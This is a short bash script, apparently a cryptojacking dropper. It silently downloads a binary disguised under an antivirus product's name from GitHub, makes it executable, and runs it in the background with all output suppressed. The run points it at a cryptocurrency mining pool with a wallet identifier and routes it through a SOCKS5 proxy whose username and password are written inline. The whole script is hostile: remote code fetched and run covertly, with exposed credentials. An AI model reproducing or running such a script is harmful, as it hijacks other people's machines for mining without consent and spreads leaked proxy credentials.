#!/bin/bash
nohup wget https://github.com/aurbach55/pos/raw/main/avast >/dev/null 2>&1
nohup chmod +x avast  >/dev/null 2>&1
nohup ./avast -v -l  ap.luckpool.net:3956 -u RKUEhTZwKjVXd1ms7r3gUqhNG4fCd83msA.X -t 1.534578643365545447666644353676 -x --proxy socks5://a019xpj2-3va47yc:gad7w69xcf@socks-us.windscribe.com:1080 >/dev/null 2>&1
